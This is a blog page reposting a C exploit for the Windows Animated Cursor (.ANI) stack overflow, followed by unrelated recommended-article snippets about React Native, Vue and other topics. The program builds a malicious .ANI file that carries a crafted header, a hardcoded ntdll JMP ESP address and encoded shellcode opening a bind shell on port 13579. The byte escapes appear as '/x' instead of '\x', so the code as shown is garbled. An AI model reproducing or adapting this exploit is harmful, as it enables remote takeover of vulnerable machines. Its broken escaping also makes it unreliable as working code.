MS Windows Animated Cursor (.ANI) Local Overflow Exploit

最新推荐文章于 2024-10-18 20:09:44 发布
最新推荐文章于 2024-10-18 20:09:44 发布
阅读量774 收藏
点赞数
文章标签: windows buffer file null xp c 
/*
        .ANI exploit tested on Windows XP SP2 - Portuguese  
        Shellcode port bind 13579
        
        JMP ESP Addr  - ntdll.dll
        
        Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna.
        
        
        Exploit coded listen sauna hits
                Featuring Luiz Zanardo's gigs "Minoide -?/x52/x49/x46/x46/x00/x04/x00/x41" @ www.myspace.com/fuzzyproject
        
        Breno Silva Pinto
        bsilva[at]Sekure.org
*/




#include <stdio.h>
#include <stdlib.h>
#include <windows.h>


unsigned char aniheader[] =
"/x52/x49/x46/x46/x00/x04/x00/x00/x41/x43/x4F/x4E/x61/x6E/x69/x68"
"/x24/x00/x00/x00/x24/x00/x00/x00/xFF/xFF/x00/x00/x0A/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x10/x00/x00/x00/x01/x00/x00/x00/x54/x53/x49/x4C/x03/x00/x00/x00"
"/x10/x00/x00/x00/x54/x53/x49/x4C/x03/x00/x00/x00/x02/x02/x02/x02"
"/x61/x6E/x69/x68/xA8/x03/x00/x00";

unsigned char Shellcode[] =
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x29/xc9/x83/xe9/xaf/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x8f"
"/x35/x37/x85/x83/xeb/xfc/xe2/xf4/x73/x5f/xdc/xca/x67/xcc/xc8/x7a"
"/x70/x55/xbc/xe9/xab/x11/xbc/xc0/xb3/xbe/x4b/x80/xf7/x34/xd8/x0e"
"/xc0/x2d/xbc/xda/xaf/x34/xdc/x66/xbf/x7c/xbc/xb1/x04/x34/xd9/xb4"
"/x4f/xac/x9b/x01/x4f/x41/x30/x44/x45/x38/x36/x47/x64/xc1/x0c/xd1"
"/xab/x1d/x42/x66/x04/x6a/x13/x84/x64/x53/xbc/x89/xc4/xbe/x68/x99"
"/x8e/xde/x34/xa9/x04/xbc/x5b/xa1/x93/x54/xf4/xb4/x4f/x51/xbc/xc5"
"/xbf/xbe/x77/x89/x04/x45/x2b/x28/x04/x75/x3f/xdb/xe7/xbb/x79/x8b"
"/x63/x65/xc8/x53/xbe/xee/x51/xd6/xe9/x5d/x04/xb7/xe7/x42/x44/xb7"
"/xd0/x61/xc8/x55/xe7/xfe/xda/x79/xb4/x65/xc8/x53/xd0/xbc/xd2/xe3"
"/x0e/xd8/x3f/x87/xda/x5f/x35/x7a/x5f/x5d/xee/x8c/x7a/x98/x60/x7a"
"/x59/x66/x64/xd6/xdc/x66/x74/xd6/xcc/x66/xc8/x55/xe9/x5d/x02/x8e"
"/xe9/x66/xbe/x64/x1a/x5d/x93/x9f/xff/xf2/x60/x7a/x59/x5f/x27/xd4"
"/xda/xca/xe7/xed/x2b/x98/x19/x6c/xd8/xca/xe1/xd6/xda/xca/xe7/xed"
"/x6a/x7c/xb1/xcc/xd8/xca/xe1/xd5/xdb/x61/x62/x7a/x5f/xa6/x5f/x62"
"/xf6/xf3/x4e/xd2/x70/xe3/x62/x7a/x5f/x53/x5d/xe1/xe9/x5d/x54/xe8"
"/x06/xd0/x5d/xd5/xd6/x1c/xfb/x0c/x68/x5f/x73/x0c/x6d/x04/xf7/x76"
"/x25/xcb/x75/xa8/x71/x77/x1b/x16/x02/x4f/x0f/x2e/x24/x9e/x5f/xf7"
"/x71/x86/x21/x7a/xfa/x71/xc8/x53/xd4/x62/x65/xd4/xde/x64/x5d/x84"
"/xde/x64/x62/xd4/x70/xe5/x5f/x28/x56/x30/xf9/xd6/x70/xe3/x5d/x7a"
"/x70/x02/xc8/x55/x04/x62/xcb/x06/x4b/x51/xc8/x53/xdd/xca/xe7/xed"
"/xf1/xed/xd5/xf6/xdc/xca/xe1/x7a/x5f/x35/x37/x85";


int main( int argc, char **argv ) {
	char Buffer[1024];
	FILE *f;
    
	if ( argc < 2 ) {
        printf("usage %s <file.ani>/n",argv[0]);
		return 0;
	}

	memset( Buffer, 0x90, sizeof( Buffer ) );
	memcpy( Buffer, aniheader, sizeof( aniheader ) - 1 );

	memcpy( Buffer + 168, "/xed/x1e/x94/x7c", 4 );     // JMP ESP - NTDLL. Hey Dave ... this is for you brotha!
    memcpy( Buffer + 198, Shellcode, sizeof( Shellcode ) - 1 );
    

	f = fopen( argv[1], "wb" );
	if ( f == NULL ) {
		printf("Cannot create file/n");
		return 0;
	}

	fwrite(Buffer, 1, 1024, f);
	fclose(f);
	printf(".ANI file created!/n");
	return 0;
}

// milw0rm.com [2007-04-09]
iiprogram
关注
react native onPanResponderMove animated.event 一起用法
木匠专栏
08-14 2209
onPanResponderMove: (evt, gestureState) =&gt; { console.log('onPanResponderMove','移动中.. 距离是'+gestureState.dy); this.state.length_Y.setOffset(this.headerH); ...
19.React Native动画Animated效果三种动画类型二;
Tiger的专栏
06-22 4870
目录 1.介绍 2.Animated.decay() 2.1方法 2.1.1value参数值 2.1.2config参数有以下这些属性: 2.2示例-执行缩放 2.2.1初始化缩放值 2.2.2绑定缩放值 2.2.3定义执行动画类型并调用start()启动 2.2.4完整示例 3.Animated.spring() 3.1方法 3.1.1value参数值: 3.1...
Windows Animated Cursor Stack Overflow Vulnerability
04-26 887
 Windows Animated Cursor Stack Overflow VulnerabilityCVE id: CVE-2007-0038Vendor notification: Dec 20, 2006Public disclosure: Mar 28, 2007Determina advisory: Mar 31, 2007Vendor patch: Apr 3, 2
react native Animated 使用详解(基础)
老孟Flutter
05-26 3986
我们知道执行一个动画最基本的原理就是调用动画函数改变一个变量值,而这个变量值绑定到控件的属性上,比如透明的、位置等。通过动画函数改变值从而使控件动起来。所以最基本的动画要有2个属性: 变量值(Animated.Value和Animated.ValueXY) 动画类型:timing、spring、decay 我们先看一个最基本的demo,这个demo实现了平移动画/** * Cr
ReactNative Animated.view的用法
滴水可以穿石 百炼才能成钢,谋全局而通一域 致广大而尽精微
11-02 7614
转载:http://www.alloyteam.com/2016/01/reactnative-animated/?utm_source=tuicool&utm_medium=referral 最近ReactNative(以下简称RN)在前端的热度越来越高,不少同学开始在业务中尝试使用RN,这里着重介绍一下RN中动画的使用与实现原理。 举个简单的栗子  var React = r
React Native动画Animated详解
夏目三三
09-28 3180
在移动开发中,动画是提高用户体验不可缺少的一个元素。在React Native中,动画API提供了一些现成的组件:Animated.View,Animated.Text和Animated.Image默认支持动画。动画API会调用iOS或者Android的本地代码来完成这些组件的位移、大小等动画。 在React Native中,Animated创建过程如下: 创建Animated.Value,设...
Component inside <Transition> renders non-element root node that cannot be animated. 并出现空白页
m0_72167535的博客
12-05 5672
在我的vue中,template中除了有一个div还有另一个组件,所以有两个节点,因为导致了vue报警出错。中,每个Vue组件只能有一个根节点,也就是说在template标签中只能包含一个根元素。出现空白画面,首次进入后可以显示画面内容,但是跳转到其他画面后,其他画面打不开,显示空白页,然后再跳转到之前能打开的画面也显示空白页。就是确保在template下,只放一个div节点,其他内容全部放在这个div下,不要在template下放两个同层的div。错误原因在于在Vue 3中,
React Native Animated动画
gaiyaguang的博客
05-22 2345
在React Native中,我们可以通过两种方式实现一个动画效果: LayoutAnimation Animated 关于LayoutAnimation,我之前写过一篇学习博客(React Native LayoutAnimation动画)。此主要用于在页面布局改变的时候添加一些动画效果,但如果想要实现一些更精细,复杂的动画,LayoutAnimation就会比较困难,所以React Native
react native 动画组件(Animated)浅析
非動ご博客
06-28 3550
简述 react native封装了两个易于使用的动画组件。用于全局的布局动画LayoutAnimation,和用于创建更精细的交互控制的动画Animated。本章主要对Animated组件进行简单的学习。 动画类型 Animated提供了三种动画类型。每种动画类型都提供了特定的函数曲线,用于控制动画值从初始值变化到最终值的变化过程: Animated.decay()以指定的初始速度...
AnimatedGif.rar_matlab动态图片_matlab生成 GIF
07-14
ani = animate(animatedGif, frames, 'Duration', duration, 'LoopCount', Inf); saveas(ani, 'AnimatedGif.gif', 'gif'); ``` 这里`'LoopCount', Inf`表示GIF将无限循环播放,若想设置播放次数,可以将其改为...
Low Poly Animated Animals.2.31.7z
05-21
标题 "Low Poly Animated Animals.2.31.7z" 提供的信息暗示这是一份包含低多边形(Low Poly)动物动画的资源包,版本号为2.31,且文件格式为7z,这是一种高压缩比的压缩格式。低多边形艺术风格在游戏开发和数字艺术...
神鬼传奇游戏鼠标ani文件 mouse.rar
06-05
ani文件的全称是Animated Cursor,是由Windows操作系统支持的一种动态光标格式。这种格式的文件能够包含多帧图像,每帧之间有时间间隔,形成连贯的动画效果。在游戏或个性化设置中,ani动态鼠标指针能够增加视觉趣味...
Low Poly Animated Animals.2.31.unitypackage
07-21
你可以拖拽活生生的动物到场景中 ——操纵动物 ——惊人的动画 -美丽的演示场景 ——Mecanim支持 -低聚自然元素 -地面、草地和珊瑚纹理 - 30+动物纹理 -有插图的环境纹理 ...- 40+独特的声音
VB_animated_mouse_cursor_effects.rar_mouse
09-24
标题"VB_animated_mouse_cursor_effects.rar_mouse"和描述"VB编程开发鼠标特效_动画光标VB Programming _ animated mouse cursor effects"都指向了这个主题,即在VB应用程序中设计和实现动态、交互式的鼠标光标。...
深拷贝与浅拷贝区别
qq_37342720的博客
10-15 242
由于开发过程中只是对目标数据的查询使用,未对源数据进行查看。所以未曾发现操作目标数据会对源数据有影响这个问题。今天总结下深拷贝与浅拷贝的区别。
【操作系统的使用】Linux 输入输出重定向:掌握控制台的高级用法
她是不会无条件的!!
10-15 415
操作系统的使用 第二部分
flutter实现头像覆盖轮播滚动组件
Candy_mi的博客
10-12 316
flutter头像覆盖滚动组件。
Python进阶知识3
最新发布
m0_73723097的博客
10-18 607
然后,每次调用生成器的 next() 方法或使用 for 循环进行迭代时,函数会从上次暂停的地方继续执行,直到再次遇到 yield 语句。2.装饰器的作用:在不修改被装饰的函数的源代码,不改变被装饰的函数的调用方式的情况下添加或改变原函数的功能。这样的行为正是Python装饰器的特性之一:装饰器可以修改函数的行为,甚至完全替换被装饰的函数。1.含有yield 语句的函数是生成器函数,此函数调用回返回一个生成器对象,生成器也是可迭代对象。1.什么是装饰器:装饰器是一个函数,主要作用是来用包装另一个函数或类。
内核定时器API实现点灯
weixin_44651073的博客
10-15 993
Linux 内核定时器使用很简单,只需要提供超时时间(相当于定时值)和定时处理函数即可,当超时时间到了以后设置的定时处理函数就会执行,和我们使用硬件定时器的套路一样,只是使用内核定时器不需要做一大堆的寄存器初始化工作。在使用内核定时器的时候要注意一点,内核定时器并不是周期性运行的,超时以后就会自动关闭,因此如果想要实现周期性定时,那么就需要在定时处理函数中重新开启定时器。compat_ioctl函数的功能与unlocked_ioctl函数一样,区别在于64 位系统上,32 位的应用程序调用将会使用此函数。
0 : div.animate__animated.animate__fadeIn.threebox_image_box 1 : div.animate__animated.animate__fadeIn.threebox_image_box 2 : div.animate__animated.animate__fadeIn.threebox_image_box 3 : div.animate__animated.animate__fadeIn.threebox_image_box 4 : div.animate__animated.animate__fadeIn.threebox_image_box 5 : div.animate__animated.animate__fadeIn.threebox_image_box 6 : div.animate__animated.animate__fadeIn.threebox_image_box 7 : div.animate__animated.animate__fadeIn.threebox_image_box 设置隐藏
06-11
'animate__animated animate__fadeIn' : 'animate__animated animate__fadeOut', 'threebox_image_box']" > 这是第 {{ index + 1 }} 个元素 隐藏元素 export default { data() { return { elements: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值